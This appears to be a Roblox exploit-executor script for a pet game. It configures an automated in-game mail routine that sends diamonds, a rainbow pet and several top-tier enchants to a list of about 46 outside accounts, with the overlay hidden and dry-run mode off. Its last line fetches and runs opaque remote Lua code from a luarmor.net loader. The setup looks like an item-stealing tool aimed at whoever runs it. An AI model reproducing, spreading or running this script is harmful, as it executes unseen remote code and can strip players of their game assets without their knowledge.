script_key = "PBgqFQESzNhuTfgQatfaWcLbqQSoMvXK";
_G.DISABLE_OVERLAY = true
_G.GDRY_RUN = false
_G.GMAIL_ITEMS = {
["Diamonds"] = {Class = "Currency", Id = "Diamonds", Amount = "3m"},
["Blooming Axolotl"] = {Class = "Pet", Id = "Blooming Axolotl", Amount = 115, IsGold = false, IsRainbow = true, IsShiny = false},
["Strong Pets"] = {Class = "Enchant",Id = "Strong Pets",Tier = 7, Amount = 1},
["Lucky Eggs"] = {Class = "Enchant",Id = "Lucky Eggs",Tier = 7, Amount = 1},
["Criticals"] = {Class = "Enchant",Id = "Criticals",Tier = 7, Amount = 1},
["Treasure Hunter"] = {Class = "Enchant",Id = "Treasure Hunter",Tier = 7, Amount = 1},
["Tap Power"] = {Class = "Enchant",Id = "Tap Power",Tier = 7, Amount = 1},
}
_G.GMAIL_RECEIVERS = {
"ZephyrNexusBlaze",
"NEXUSROSE_sparkle",
"VioletShadow2023",
"Mrsglintbrook2022",
"tarasunnygust",
"FaithOozetwist",
"rach3lChaos",
"TheRealwendy_Quartz",
"EllaHawktide94",
"TheRealIsaac_AURORA",
"MrsEzra_Bolt",
"Layla_COMET57",
"HunterFlick71_YT",
"MrsJuliaOblivion",
"Amaya_B3ast",
"SebastianBacon2014",
"MrsmaryXenon2018",
"Clara_th0rn",
"JakeGlimmer2017",
"TheRealAmayaGiga27",
"brookFalcon",
"Br00klynnSigma",
"Byt3PrismGobbl360",
"Nexus_ash32",
"ItsLukevale",
"ItsNancyTwist2008",
"zo3Cosmos",
"AddiemirthJelly",
"Mrsjumpy_FURY",
"Holly_Sparkly2005",
"IgniteBearwhisper",
"Vict0riaB0unce",
"ItsLucasDusk2009",
"sparkleFableOmega",
"Leahstone2007",
"Mrskateglint",
"Audr3yDynamo",
"MrsJoshua_EAGLE",
"FaithPrismNebula",
"TheRealtaraBlizzardb",
"Xero_twirl",
"Emilybloom2014",
"Itsquinnwind",
"Alexander_Puddle",
"Eliflake12",
"NexusLucasOrbitzBaco",
}

_G.GMAIL_DELAY  = 0
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/8f386eb537ee7b37a8f0ad37fe6dbc60.lua"))()
